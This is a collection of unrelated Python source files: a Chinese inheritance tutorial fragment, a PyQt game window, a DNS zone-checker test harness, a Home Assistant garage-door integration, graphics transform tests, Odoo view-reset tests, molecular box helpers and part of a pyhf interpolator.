# 继承的作用一一子类扩展(继承〉了父类, 将可以继承得到父类定义的方法,这样子类就可复用父类的方法了
# 在python不推荐使用多继承
class SubClass(SuperClass1, SuperClass2):
pass
# 重写
# 子类包含与父类同名的方法的现象被称为方法重写( Override),也被称为方法覆盖。
# 可以说子类重写了父类的方法,也可以说子类覆盖了父类的方法。
# 如何调用父类中被重写的方法?
class BaseClass:
    def foo(self):
        print('父类中定义的 foo方法')

class SubClass(BaseClass):
    # Override the parent's foo method.
    def foo(self):
        print('子类重写父类中的 foo方法')
    def bar(self):
        print('执行 bar 方法')
        # A plain call dispatches to the subclass override.
        self.foo()
        # Calling through the class name (unbound method) reaches the
        # parent's overridden foo.
        BaseClass.foo(self)
# Fix: the original read ``Subclass()`` (lowercase c), a NameError — the
# class defined above is ``SubClass``.
sc = SubClass()
sc.bar()
# Python requires: if a subclass overrides the parent constructor, the
# subclass constructor must call the parent constructor itself.
# Manager inherits from Employee and Customer (neither is defined in this
# file — illustrative fragment only).
class Manager(Employee, Customer):
    # Override the parent constructor.
    def __init__(self, salary, favorite, address):
        print('一Manager 的构造方法一')
        # Call a parent constructor via super().
        super().__init__(salary=salary, favorite=favorite, address=address)
        # Same effect as the line above.
        super(Manager, self).__init__(salary)
        # Call a parent constructor as an unbound method.
        Customer.__init__(self, favorite, address)

# Create a Manager object.
m = Manager(25000, 'IT 产品', '广州')
m.work() #1
m.info() #2
blackjack-client/view/AboutPage.py | lehoangtran289/Blackjack | 0 | 12757398 | from PyQt5 import QtCore, QtWidgets, QtGui, uic
from utils import configs, Connection
import socket
from view import HomePage
class aboutPage(QtWidgets.QWidget):
    """'About' window: shows contributors and game rules from ``configs``.

    Closing the window normally asks for confirmation and logs the user
    out; navigating back to the home page closes it silently.
    """

    def __init__(self, user, connection, x, y):
        """Build the widget from ``about.ui`` and place it at (x, y)."""
        super().__init__()
        uic.loadUi('./ui/about.ui', self)
        self.user = user
        self.connection = connection
        self.back_button.clicked.connect(self.back)
        # Distinguishes a user-initiated close (confirm + logout) from the
        # programmatic close performed when navigating back.
        self.close_on_purpose = True
        self.contributors.setText(configs.contributors)
        self.rules.setText(configs.rules)
        self.setWindowTitle('About')
        self.setFixedSize(800, 600)
        self.setGeometry(x, y, 800, 600)

    def closeEvent(self, event):
        """Confirm quitting; on Yes send a LOGOUT request before closing."""
        if self.close_on_purpose == False:
            # Programmatic close (back navigation): no confirmation dialog.
            event.accept()
            return
        reply = QtWidgets.QMessageBox.question(self, 'Quit', 'Are you sure you want to quit?', \
            QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No)
        if reply == QtWidgets.QMessageBox.Yes:
            request = 'LOGOUT ' + self.user.username
            self.connection.send(request)
            event.accept()
        else:
            event.ignore()

    def back(self):
        """Open the home page slightly offset from this window, then close."""
        self.home_page = HomePage.homePage(self.user, self.connection, self.pos().x(), self.pos().y() + 30)
        self.close_on_purpose = False
        self.close()
        self.home_page.show()
DifferentialTesting/Scripts/preprocessor_checks.py | RajdeepMondal/Ferret | 9 | 12757399 | <reponame>RajdeepMondal/Ferret<filename>DifferentialTesting/Scripts/preprocessor_checks.py
"""
Run zone preprocessors on (invalid) zone files
usage: preprocessor_checks.py [-h] [-path DIRECTORY_PATH] [-id {1,2,3,4,5}]
[-b] [-n] [-k] [-p] [-l]
optional arguments:
-h, --help show this help message and exit
-path DIRECTORY_PATH The path to the directory containing ZoneFiles; looks
for ZoneFiles directory recursively(default:
Results/InvalidZoneFileTests/)
-id {1,2,3,4,5} Unique id for all the containers (default: 1)
-b Disable Bind. (default: False)
-n Disable Nsd. (default: False)
-k Disable Knot. (default: False)
-p Disable PowerDns. (default: False)
-l, --latest Test using latest image tag. (default: False)
"""
#!/usr/bin/env python3
from datetime import datetime
import json
import pathlib
import subprocess
import time
import sys
from argparse import SUPPRESS, ArgumentDefaultsHelpFormatter, ArgumentParser, Namespace
from typing import Dict, Tuple
PREPROCESSOR_DIRECTORY = "PreprocessorOutputs/"
def get_ports(input_args: Namespace) -> Dict[str, Tuple[bool, int]]:
    """
    Returns a map from an implementation to the host port its container port 53
    should be mapped and whether that implementation should be tested.

    :param input_args: The input arguments (the -b/-n/-k/-p flags disable
        the corresponding implementation)
    """
    flag_and_port = [('bind', input_args.b, 8000),
                     ('nsd', input_args.n, 8100),
                     ('knot', input_args.k, 8200),
                     ('powerdns', input_args.p, 8300)]
    # An implementation is enabled unless its disable flag was passed.
    return {name: (not disabled, port) for name, disabled, port in flag_and_port}
def delete_container(container_name: str) -> None:
    """Force-remove the named Docker container if it currently exists."""
    cmd_status = subprocess.run(
        ['docker', 'ps', '-a', '--format', '"{{.Names}}"'], stdout=subprocess.PIPE, check=False)
    output = cmd_status.stdout.decode("utf-8")
    if cmd_status.returncode != 0:
        sys.exit(f'Error in executing Docker ps command: {output}')
    # The --format template wraps each name in literal quotes; strip them.
    all_container_names = [name[1:-1] for name in output.strip().split("\n")]
    if container_name in all_container_names:
        subprocess.run(['docker', 'container', 'rm', '-f', container_name], check=True)
def bind(zone_file: pathlib.Path,
         origin: str,
         cid: str,
         new: bool,
         port: int,
         tag: str) -> Tuple[int, str]:
    """
    Uses a Bind container to check the input zone file with Bind preprocessor named-checkzone.
    Returns the preprocessor return code and output.

    :param zone_file: The path to the zone file
    :param zone_domain: The zone origin
    :param cid: The unique id for the container
    :param new: Whether to load the input zone file in a new container
                    or reuse the existing container
    :param port: The host port to map to the container port 53
    :param tag: Tag of the image to use
    """
    if new:
        # Replace any stale container before starting a fresh one.
        delete_container(f'{cid}_bind_server')
        subprocess.run(['docker', 'run', '-dp', str(port * int(cid))+':53/udp',
                        '--name=' + cid + '_bind_server', 'bind' + tag], check=False)
    # Copy the zone file into the (new or reused) container.
    subprocess.run(['docker', 'cp', zone_file, cid +
                    '_bind_server:.'], check=False)
    # '-i local' / '-k ignore' relax the integrity and name checks,
    # presumably so deliberately invalid test zones still get parsed.
    compilezone = subprocess.run(['docker', 'exec', cid + '_bind_server', 'named-checkzone', '-i',
                                  'local', '-k', 'ignore', origin, f'{zone_file.name}'],
                                 stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False)
    output = compilezone.stdout.decode("utf-8").strip().split('\n')
    return (compilezone.returncode, output)
def nsd(zone_file: pathlib.Path,
        origin: str,
        cid: str,
        new: bool,
        port: int,
        tag: str) -> Tuple[int, str]:
    """
    Check *zone_file* with NSD's preprocessor (nsd-checkzone) inside a
    Docker container and return the tool's return code and output lines.
    :param zone_file: The path to the zone file
    :param origin: The zone origin
    :param cid: The unique id for the container
    :param new: Whether to start a fresh container or reuse the existing one
    :param port: The host port to map to the container port 53
    :param tag: Tag of the image to use
    """
    container = f'{cid}_nsd_server'
    if new:
        # Start from a clean container before loading the zone.
        delete_container(container)
        subprocess.run(['docker', 'run', '-dp', f'{port * int(cid)}:53/udp',
                        f'--name={container}', f'nsd{tag}'], check=False)
    subprocess.run(['docker', 'cp', zone_file, f'{container}:.'], check=False)
    checker = subprocess.run(['docker', 'exec', container, 'nsd-checkzone',
                              origin, f'{zone_file.name}'],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False)
    lines = checker.stdout.decode("utf-8").strip().split('\n')
    return (checker.returncode, lines)
def knot(zone_file: pathlib.Path,
         origin: str,
         cid: str,
         new: bool,
         port: int,
         tag: str) -> Tuple[int, str]:
    """
    Check *zone_file* with Knot's preprocessor (kzonecheck) inside a
    Docker container and return the tool's return code and output lines.
    :param zone_file: The path to the zone file
    :param origin: The zone origin
    :param cid: The unique id for the container
    :param new: Whether to start a fresh container or reuse the existing one
    :param port: The host port to map to the container port 53
    :param tag: Tag of the image to use
    """
    container = f'{cid}_knot_server'
    if new:
        # Start from a clean container before loading the zone.
        delete_container(container)
        subprocess.run(['docker', 'run', '-dp', f'{port * int(cid)}:53/udp',
                        f'--name={container}', f'knot{tag}'], check=False)
    subprocess.run(['docker', 'cp', zone_file, f'{container}:.'], check=False)
    checker = subprocess.run(['docker', 'exec', container, 'kzonecheck', '-v', '-o',
                              origin, f'{zone_file.name}'],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False)
    lines = checker.stdout.decode("utf-8").strip().split('\n')
    return (checker.returncode, lines)
def powerdns(zone_file: pathlib.Path,
             origin: str,
             cid: str,
             new: bool,
             port: int,
             tag: str) -> Tuple[int, str]:
    """
    Check *zone_file* with PowerDNS's preprocessor (pdnsutil check-zone)
    inside a Docker container and return the tool's return code and output.
    :param zone_file: The path to the zone file
    :param origin: The zone origin
    :param cid: The unique id for the container
    :param new: Whether to start a fresh container or reuse the existing one
    :param port: The host port to map to the container port 53
    :param tag: Tag of the image to use
    """
    container = f'{cid}_powerdns_server'
    if new:
        # Start from a clean container before loading the zone.
        delete_container(container)
        subprocess.run(['docker', 'run', '-dp', f'{port * int(cid)}:53/udp',
                        f'--name={container}', f'powerdns{tag}'], check=False)
    subprocess.run(['docker', 'cp', zone_file,
                    f'{container}:/usr/local/etc/{origin}'], check=False)
    # PowerDNS reads the zone through its bind backend; generate its config,
    # copy it into the container, then remove the local temporary file.
    bindbackend = f'zone "{origin}" {{\n    file "/usr/local/etc/{origin}";\n    type master;\n}};'
    conf_name = f'bindbackend{cid}.conf'
    with open(conf_name, 'w') as file_pointer:
        file_pointer.write(bindbackend)
    subprocess.run(['docker', 'cp', conf_name,
                    f'{container}:/usr/local/etc/bindbackend.conf'], check=False)
    pathlib.Path(conf_name).unlink()
    # Normalise line endings inside the container before parsing.
    subprocess.run(['docker', 'exec', container,
                    'dos2unix', '/usr/local/etc/bindbackend.conf'], check=False)
    checker = subprocess.run(['docker', 'exec', container, 'pdnsutil', '-v',
                              'check-zone', f'{origin}'],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False)
    lines = checker.stdout.decode("utf-8").strip().split('\n')
    return (checker.returncode, lines)
def check_zone_with_preprocessors(input_args: Namespace,
                                  directory: pathlib.Path,
                                  zone_path: pathlib.Path,
                                  cid: str,
                                  new: bool) -> bool:
    """
    Run every enabled implementation's preprocessor over one zone file and
    dump their return codes and outputs as JSON. Returns whether any check ran.
    :param input_args: The input arguments
    :param directory: The path to store the preprocessor outputs
    :param zone_path: The path to the zone file
    :param cid: The unique id for the container
    :param new: Whether to load the input zone file in a new container
        or reuse the existing container
    """
    tag = ':latest' if input_args.latest else ':oct'
    # The zone origin is the owner name of the (last) SOA record.
    origin = ''
    with open(zone_path, 'r') as zone_fp:
        for line in zone_fp:
            if 'SOA' in line:
                origin = line.split('\t')[0]
                if ' ' in origin:
                    origin = line.split()[0]
    if not origin:
        print(f'{datetime.now()}\tSkipping {zone_path.stem} as no SOA is found')
        return False
    # Map each implementation key to its JSON label and checker function.
    checkers = {
        'bind': ('Bind', bind),
        'nsd': ('Nsd', nsd),
        'knot': ('Knot', knot),
        'powerdns': ('Powerdns', powerdns),
    }
    outputs = {}
    for impl, (check, port) in get_ports(input_args).items():
        if not check:
            continue
        label, checker = checkers[impl]
        outputs[label] = {}
        outputs[label]["Code"], outputs[label]["Output"] = checker(
            zone_path, origin, cid, new, port, tag)
    with open(directory / PREPROCESSOR_DIRECTORY / (zone_path.stem + '.json'), 'w') as output_fp:
        json.dump(outputs, output_fp, indent=2)
    return True
def preprocessor_check_helper(input_args: Namespace, input_dir: pathlib.Path) -> None:
    """
    Helper function to check (invalid) zone files with implementations' preprocessors.
    Iterates recursively over the input directory to find ZoneFiles directory and
    calls check_zone_with_preprocessors function to check a zone file.
    :param input_args: The input arguments
    :param input_dir: The path to the parent directory with ZoneFiles directory.
    """
    # Exit if the inputted path does not exist or is not a directory.
    # (Fixed: the previous guard negated an `or`, so it only returned when the
    # path neither existed nor was a directory, letting plain files through.)
    if not input_dir.exists() or not input_dir.is_dir():
        return
    input_zone_files_dir = input_dir / 'ZoneFiles/'
    output_zone_file_dir = input_dir / PREPROCESSOR_DIRECTORY
    if input_zone_files_dir.exists() and input_zone_files_dir.is_dir():
        output_zone_file_dir.mkdir(parents=True, exist_ok=True)
        # First file gets a fresh container; later ones reuse it when possible.
        new_container = False
        print(
            f'{datetime.now()}\tStarted checking the zone files in {input_zone_files_dir}')
        start = time.time()
        for zone_path in input_zone_files_dir.iterdir():
            if not zone_path.is_file():
                continue
            new_container = check_zone_with_preprocessors(
                input_args, input_dir, zone_path, str(input_args.id), not new_container)
        # Fixed: a space was missing between "in" and the directory name.
        print(f'{datetime.now()}\tFinished checking the zone files in '
              f'{input_zone_files_dir} in {time.time() - start}')
    else:
        # No ZoneFiles here; recurse into subdirectories looking for one.
        for subdir in input_dir.iterdir():
            preprocessor_check_helper(input_args, subdir)
if __name__ == '__main__':
    # Command-line entry point: build the argument parser, resolve the target
    # directory (falling back to the default when -path is omitted), then run.
    parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter,
                            description='Run zone preprocessors on (invalid) zone files')
    parser.add_argument('-path', metavar='DIRECTORY_PATH', default=SUPPRESS,
                        help='The path to the directory containing ZoneFiles; '
                        'looks for ZoneFiles directory recursively'
                        '(default: Results/InvalidZoneFileTests/)')
    parser.add_argument('-id', type=int, default=1, choices=range(1, 6),
                        help='Unique id for all the containers')
    parser.add_argument('-b', help='Disable Bind.', action="store_true")
    parser.add_argument('-n', help='Disable Nsd.', action="store_true")
    parser.add_argument('-k', help='Disable Knot.', action="store_true")
    parser.add_argument('-p', help='Disable PowerDns.', action="store_true")
    parser.add_argument(
        '-l', '--latest', help='Test using latest image tag.', action="store_true")
    args = parser.parse_args()
    # -path uses SUPPRESS, so the attribute is absent when not supplied.
    dir_path = pathlib.Path(getattr(args, 'path', 'Results/InvalidZoneFileTests/'))
    if not dir_path.exists():
        print(f'The input path {dir_path} does not exist.')
    else:
        preprocessor_check_helper(args, dir_path)
| 2.828125 | 3 |
homeassistant/components/cover/ryobi_gdo.py | don66/home-assistant | 7 | 12757400 | <reponame>don66/home-assistant
"""
Ryobi platform for the cover component.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/cover.ryobi_gdo/
"""
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.cover import (
CoverDevice, PLATFORM_SCHEMA, SUPPORT_OPEN, SUPPORT_CLOSE)
from homeassistant.const import (
CONF_USERNAME, CONF_PASSWORD, STATE_UNKNOWN, STATE_CLOSED)
# PyPI package required by Home Assistant to talk to the Ryobi GDO cloud API.
REQUIREMENTS = ['py_ryobi_gdo==0.0.10']
_LOGGER = logging.getLogger(__name__)
# Configuration key for the list of garage-door-opener device ids.
CONF_DEVICE_ID = 'device_id'
# Platform configuration: one or more device ids plus account credentials.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
    vol.Required(CONF_DEVICE_ID): vol.All(cv.ensure_list, [cv.string]),
    vol.Required(CONF_PASSWORD): cv.string,
    vol.Required(CONF_USERNAME): cv.string,
})
# The opener only supports opening and closing (no position control).
SUPPORTED_FEATURES = (SUPPORT_OPEN | SUPPORT_CLOSE)
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up the Ryobi covers."""
    from py_ryobi_gdo import RyobiGDO as ryobi_door
    username = config.get(CONF_USERNAME)
    password = config.get(CONF_PASSWORD)
    covers = []
    # Validate credentials and device ids; abort the whole setup on failure.
    for device_id in config.get(CONF_DEVICE_ID):
        door = ryobi_door(username, password, device_id)
        _LOGGER.debug("Getting the API key")
        if door.get_api_key() is False:
            _LOGGER.error("Wrong credentials, no API key retrieved")
            return
        _LOGGER.debug("Checking if the device ID is present")
        if door.check_device_id() is False:
            _LOGGER.error("%s not in your device list", device_id)
            return
        _LOGGER.debug("Adding device %s to covers", device_id)
        covers.append(RyobiCover(hass, door))
    if covers:
        _LOGGER.debug("Adding covers")
        add_devices(covers, True)
class RyobiCover(CoverDevice):
    """Representation of a ryobi cover."""

    def __init__(self, hass, ryobi_door):
        """Initialize the cover."""
        self.ryobi_door = ryobi_door
        self._door_state = None
        self._name = f'ryobi_gdo_{ryobi_door.get_device_id()}'

    @property
    def name(self):
        """Return the name of the cover."""
        return self._name

    @property
    def device_class(self):
        """Return the class of this device, from component DEVICE_CLASSES."""
        return 'garage'

    @property
    def supported_features(self):
        """Flag supported features."""
        return SUPPORTED_FEATURES

    @property
    def is_closed(self):
        """Return if the cover is closed."""
        # An unknown state is reported as "not closed".
        if self._door_state == STATE_UNKNOWN:
            return False
        return self._door_state == STATE_CLOSED

    def open_cover(self, **kwargs):
        """Open the cover."""
        _LOGGER.debug("Opening garage door")
        self.ryobi_door.open_device()

    def close_cover(self, **kwargs):
        """Close the cover."""
        _LOGGER.debug("Closing garage door")
        self.ryobi_door.close_device()

    def update(self):
        """Update status from the door."""
        _LOGGER.debug("Updating RyobiGDO status")
        self.ryobi_door.update()
        self._door_state = self.ryobi_door.get_door_status()
| 1.992188 | 2 |
tests/test_transforms.py | blrm/vsketch | 0 | 12757401 | <reponame>blrm/vsketch
import numpy as np
import pytest
from .utils import bounds_equal, line_count_equal, line_exists
POLYGON = np.array([0, 1, 3 + 1j, 4 - 2j])
@pytest.mark.parametrize(
    ["scale", "expected"],
    [
        [(1, 1), POLYGON],
        [(2, 2), 2 * POLYGON],
        [(2, None), 2 * POLYGON],
        [(2, 3), 2 * POLYGON.real + 3j * POLYGON.imag],
        [("in", None), 96.0 * POLYGON],
        [("2in", 3), 2 * 96 * POLYGON.real + 3j * POLYGON.imag],
    ],
)
def test_scale(vsk, scale, expected):
    """scale() applies per-axis factors, including unit strings ("in" maps to 96 px)."""
    vsk.scale(*scale)
    vsk.polygon(POLYGON.real, POLYGON.imag)
    assert line_count_equal(vsk, 1)
    # noinspection PyTypeChecker
    assert line_exists(vsk, expected)
def test_scale_no_y(vsk):
    """scale() with a single factor scales both axes uniformly."""
    vsk.scale(2)
    vsk.polygon(POLYGON.real, POLYGON.imag)
    assert line_count_equal(vsk, 1)
    assert line_exists(vsk, 2 * POLYGON)
def test_translate(vsk):
    """translate() offsets subsequent geometry by (dx, dy)."""
    vsk.translate(12, 23)
    vsk.polygon(POLYGON.real, POLYGON.imag)
    assert line_count_equal(vsk, 1)
    assert line_exists(vsk, POLYGON + 12 + 23j)
def test_rotate_radians(vsk):
    """rotate() interprets its argument in radians by default."""
    vsk.rotate(np.pi / 2)
    vsk.rect(5, 0, 1, 2)
    assert line_count_equal(vsk, 1)
    assert bounds_equal(vsk, -2, 5, 0, 6)
def test_rotate_deg_rad(vsk):
    """Radian and degree rotations compose; opposite rotations cancel out."""
    vsk.rotate(np.pi / 2)
    vsk.rotate(-90, degrees=True)
    vsk.polygon(POLYGON.real, POLYGON.imag)
    assert line_count_equal(vsk, 1)
    assert line_exists(vsk, POLYGON)
def test_resetMatrix(vsk):
    """resetMatrix() discards any accumulated transformation."""
    vsk.scale(10, 2)
    vsk.resetMatrix()
    vsk.polygon(POLYGON.real, POLYGON.imag)
    assert line_count_equal(vsk, 1)
    assert line_exists(vsk, POLYGON)
def test_pushMatrix(vsk):
    """popMatrix() restores the transform saved by pushMatrix()."""
    vsk.pushMatrix()
    vsk.scale(100, 200)
    vsk.rotate(34)
    vsk.popMatrix()
    vsk.polygon(POLYGON.real, POLYGON.imag)
    assert line_count_equal(vsk, 1)
    assert line_exists(vsk, POLYGON)
def test_pushMatrix_context(vsk):
    """pushMatrix() also works as a context manager that restores on exit."""
    with vsk.pushMatrix():
        vsk.scale(100, 200)
        vsk.rotate(34)
    vsk.polygon(POLYGON.real, POLYGON.imag)
    assert line_count_equal(vsk, 1)
    assert line_exists(vsk, POLYGON)
| 2.171875 | 2 |
odoo-13.0/addons/test_website/tests/test_reset_views.py | VaibhavBhujade/Blockchain-ERP-interoperability | 0 | 12757402 | # Part of Odoo. See LICENSE file for full copyright and licensing details.
import re
import odoo.tests
from odoo.tools import mute_logger
def break_view(view, fr='<p>placeholder</p>', to='<p t-field="not.exist"/>'):
    """Corrupt *view* in place by swapping the *fr* snippet for *to* in its arch."""
    broken_arch = view.arch.replace(fr, to)
    view.arch = broken_arch
@odoo.tests.common.tagged('post_install', '-at_install')
class TestWebsiteResetViews(odoo.tests.HttpCase):
    """End-to-end checks that broken website views can be reset via /website/reset_template."""
    def fix_it(self, page, mode='soft'):
        # Visiting a broken page must return a 500 that offers the reset
        # widget; posting the extracted view id to /website/reset_template
        # must then repair the page.
        self.authenticate("admin", "admin")
        resp = self.url_open(page)
        self.assertEqual(resp.status_code, 500, "Waiting 500")
        self.assertTrue('<button data-mode="soft" class="reset_templates_button' in resp.text)
        data = {'view_id': self.find_template(resp), 'redirect': page, 'mode': mode}
        resp = self.url_open('/website/reset_template', data)
        self.assertEqual(resp.status_code, 200, "Waiting 200")
    def find_template(self, response):
        # Pull the broken view's id out of the error page's hidden input.
        find = re.search(r'<input.*type="hidden".*name="view_id".*value="([0-9]+)?"', response.text)
        return find and find.group(1)
    def setUp(self):
        super(TestWebsiteResetViews, self).setUp()
        self.Website = self.env['website']
        self.View = self.env['ir.ui.view']
        self.test_view = self.Website.viewref('test_website.test_view')
    @mute_logger('odoo.addons.http_routing.models.ir_http')
    def test_01_reset_specific_page_view(self):
        self.test_page_view = self.Website.viewref('test_website.test_page_view')
        total_views = self.View.search_count([('type', '=', 'qweb')])
        # Trigger COW then break the QWEB XML on it
        break_view(self.test_page_view.with_context(website_id=1))
        self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view")
        self.fix_it('/test_page_view')
    @mute_logger('odoo.addons.http_routing.models.ir_http')
    def test_02_reset_specific_view_controller(self):
        total_views = self.View.search_count([('type', '=', 'qweb')])
        # Trigger COW then break the QWEB XML on it
        # `t-att-data="not.exist"` will test the case where exception.html contains branding
        break_view(self.test_view.with_context(website_id=1), to='<p t-att-data="not.exist" />')
        self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view")
        self.fix_it('/test_view')
    @mute_logger('odoo.addons.http_routing.models.ir_http')
    def test_03_reset_specific_view_controller_t_called(self):
        self.test_view_to_be_t_called = self.Website.viewref('test_website.test_view_to_be_t_called')
        total_views = self.View.search_count([('type', '=', 'qweb')])
        # Trigger COW then break the QWEB XML on it
        break_view(self.test_view_to_be_t_called.with_context(website_id=1))
        break_view(self.test_view, to='<t t-call="test_website.test_view_to_be_t_called"/>')
        self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view")
        self.fix_it('/test_view')
    @mute_logger('odoo.addons.http_routing.models.ir_http')
    def test_04_reset_specific_view_controller_inherit(self):
        self.test_view_child_broken = self.Website.viewref('test_website.test_view_child_broken')
        # Activate and break the inherited view
        self.test_view_child_broken.active = True
        break_view(self.test_view_child_broken.with_context(website_id=1, load_all_views=True))
        self.fix_it('/test_view')
    # This test works in real life, but not in test mode since we cannot roll back a savepoint.
    # @mute_logger('odoo.addons.http_routing.models.ir_http', 'odoo.addons.website.models.ir_ui_view')
    # def test_05_reset_specific_view_controller_broken_request(self):
    #     total_views = self.View.search_count([('type', '=', 'qweb')])
    #     # Trigger COW then break the QWEB XML on it
    #     break_view(self.test_view.with_context(website_id=1), to='<t t-esc="request.env[\'website\'].browse(\'a\').name" />')
    #     self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view (1)")
    #     self.fix_it('/test_view')
    # also mute ir.ui.view as `get_view_id()` will raise "Could not find view object with xml_id 'not.exist'""
    @mute_logger('odoo.addons.http_routing.models.ir_http', 'odoo.addons.website.models.ir_ui_view')
    def test_06_reset_specific_view_controller_inexisting_template(self):
        total_views = self.View.search_count([('type', '=', 'qweb')])
        # Trigger COW then break the QWEB XML on it
        break_view(self.test_view.with_context(website_id=1), to='<t t-call="not.exist"/>')
        self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view (2)")
        self.fix_it('/test_view')
    @mute_logger('odoo.addons.http_routing.models.ir_http')
    def test_07_reset_page_view_complete_flow(self):
        # Break, fix, then break and fix again through the website editor tour.
        self.start_tour("/", 'test_reset_page_view_complete_flow_part1', login="admin")
        self.fix_it('/test_page_view')
        self.start_tour("/", 'test_reset_page_view_complete_flow_part2', login="admin")
        self.fix_it('/test_page_view')
    @mute_logger('odoo.addons.http_routing.models.ir_http')
    def test_08_reset_specific_page_view_hard_mode(self):
        self.test_page_view = self.Website.viewref('test_website.test_page_view')
        total_views = self.View.search_count([('type', '=', 'qweb')])
        # Trigger COW then break the QWEB XML on it
        break_view(self.test_page_view.with_context(website_id=1))
        # Break it again to have a previous arch different than file arch
        break_view(self.test_page_view.with_context(website_id=1))
        self.assertEqual(total_views + 1, self.View.search_count([('type', '=', 'qweb')]), "Missing COW view")
        with self.assertRaises(AssertionError):
            # soft reset should not be able to reset the view as previous
            # version is also broken
            self.fix_it('/test_page_view')
        self.fix_it('/test_page_view', 'hard')
| 2.015625 | 2 |
molsysmt/_private/digestion/box.py | uibcdf/MolModMTs | 0 | 12757403 | import numpy as np
from molsysmt import puw
from ..exceptions import *
def digest_box(box):
    # Currently a pass-through: no validation or normalization is applied yet.
    return box
def digest_box_lengths_value(box_lengths):
    """Normalize a unitless box-lengths array to shape (n_frames, 3).

    Parameters
    ----------
    box_lengths : array-like
        Either a single frame of three lengths (shape ``(3,)``) or several
        frames (shape ``(n_frames, 3)``).

    Returns
    -------
    numpy.ndarray
        Array with shape ``(n_frames, 3)``.

    Raises
    ------
    ValueError
        If the input cannot be interpreted as ``(3,)`` or ``(n, 3)``.
    """
    # asarray avoids copying when the input is already an ndarray.
    box_lengths = np.asarray(box_lengths)
    if box_lengths.ndim == 1 and box_lengths.shape[0] == 3:
        # Promote a single frame to a one-frame trajectory.
        return np.expand_dims(box_lengths, axis=0)
    if box_lengths.ndim == 2 and box_lengths.shape[1] == 3:
        return box_lengths
    # Fixed error message (was: "array with has not the correct shape").
    raise ValueError('box_lengths array has not the correct shape.')
def digest_box_lengths(box_lengths):
    """Normalize a box-lengths quantity to shape (n_frames, 3), preserving its unit."""
    unit = puw.get_unit(box_lengths)
    values = digest_box_lengths_value(puw.get_value(box_lengths))
    return values * unit
def digest_box_angles_value(box_angles):
    """Normalize a unitless box-angles array to shape (n_frames, 3).

    Parameters
    ----------
    box_angles : array-like
        Either a single frame of three angles (shape ``(3,)``) or several
        frames (shape ``(n_frames, 3)``).

    Returns
    -------
    numpy.ndarray
        Array with shape ``(n_frames, 3)``.

    Raises
    ------
    ValueError
        If the input cannot be interpreted as ``(3,)`` or ``(n, 3)``.
    """
    # asarray avoids copying when the input is already an ndarray.
    box_angles = np.asarray(box_angles)
    if box_angles.ndim == 1 and box_angles.shape[0] == 3:
        # Promote a single frame to a one-frame trajectory.
        return np.expand_dims(box_angles, axis=0)
    if box_angles.ndim == 2 and box_angles.shape[1] == 3:
        return box_angles
    # Fixed error message (was: "array with has not the correct shape").
    raise ValueError('box_angles array has not the correct shape.')
def digest_box_angles(box_angles):
    """Normalize a box-angles quantity to shape (n_frames, 3), preserving its unit."""
    unit = puw.get_unit(box_angles)
    values = digest_box_angles_value(puw.get_value(box_angles))
    return values * unit
| 2.59375 | 3 |
src/pyhf/interpolators/code4.py | alexander-held/pyhf | 0 | 12757404 | <gh_stars>0
"""Polynomial Interpolation (Code 4)."""
import logging
import math
import pyhf
from pyhf.tensor.manager import get_backend
from pyhf import events
from pyhf.interpolators import _slow_interpolator_looper
log = logging.getLogger(__name__)
class code4:
    r"""
    The polynomial interpolation and exponential extrapolation strategy.
    .. math::
        \sigma_{sb} (\vec{\alpha}) = \sigma_{sb}^0(\vec{\alpha}) \underbrace{\prod_{p \in \text{Syst}} I_\text{poly|exp.} (\alpha_p; \sigma_{sb}^0, \sigma_{psb}^+, \sigma_{psb}^-, \alpha_0)}_\text{factors to calculate}
    with
    .. math::
        I_\text{poly|exp.}(\alpha; I^0, I^+, I^-, \alpha_0) = \begin{cases} \left(\frac{I^+}{I^0}\right)^{\alpha} \qquad \alpha \geq \alpha_0\\ 1 + \sum_{i=1}^6 a_i \alpha^i \qquad |\alpha| < \alpha_0 \\ \left(\frac{I^-}{I^0}\right)^{-\alpha} \qquad \alpha < -\alpha_0 \end{cases}
    and the :math:`a_i` are fixed by the boundary conditions
    .. math::
        \sigma_{sb}(\alpha=\pm\alpha_0), \left.\frac{\mathrm{d}\sigma_{sb}}{\mathrm{d}\alpha}\right|_{\alpha=\pm\alpha_0}, \mathrm{ and } \left.\frac{\mathrm{d}^2\sigma_{sb}}{\mathrm{d}\alpha^2}\right|_{\alpha=\pm\alpha_0}.
    Namely that :math:`\sigma_{sb}(\vec{\alpha})` is continuous, and its first- and second-order derivatives are continuous as well.
    """
    def __init__(self, histogramssets, subscribe=True, alpha0=1):
        """Polynomial Interpolation."""
        default_backend = pyhf.default_backend
        # alpha0 is assumed to be positive and non-zero. If alpha0 == 0, then
        # we cannot calculate the coefficients (e.g. determinant == 0)
        assert alpha0 > 0
        self.__alpha0 = alpha0
        self._histogramssets = default_backend.astensor(histogramssets)
        # initial shape will be (nsysts, 1)
        self.alphasets_shape = (self._histogramssets.shape[0], 1)
        # precompute terms that only depend on the histogramssets
        self._deltas_up = default_backend.divide(
            self._histogramssets[:, :, 2], self._histogramssets[:, :, 1]
        )
        self._deltas_dn = default_backend.divide(
            self._histogramssets[:, :, 0], self._histogramssets[:, :, 1]
        )
        self._broadcast_helper = default_backend.ones(
            default_backend.shape(self._deltas_up)
        )
        self._alpha0 = self._broadcast_helper * self.__alpha0
        deltas_up_alpha0 = default_backend.power(self._deltas_up, self._alpha0)
        deltas_dn_alpha0 = default_backend.power(self._deltas_dn, self._alpha0)
        # x = A^{-1} b
        # A_inverse is the closed-form inverse of the 6x6 boundary-condition
        # matrix A (the rows of A are written out in _slow_code4's docstring);
